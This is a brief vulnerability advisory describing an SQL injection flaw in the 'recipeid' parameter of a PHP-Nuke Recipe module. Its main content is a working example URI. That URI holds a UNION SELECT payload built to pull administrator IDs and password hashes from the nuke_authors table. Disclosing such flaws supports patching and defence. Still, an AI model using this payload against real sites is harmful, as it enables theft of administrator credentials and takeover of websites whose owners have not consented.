PHP-Nuke Recipe Module 'recipeid' Parameter SQL Injection Vulnerability

PHP-Nuke Recipe Module 'recipeid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/modules.php?name=Recipe&recipeid=-000/**/union+select+0,pwd,0,0x3a,0x3a,0,aid,aid,pwd,0,0,0,0,0x3a,0,0/**/from/**/nuke_authors/*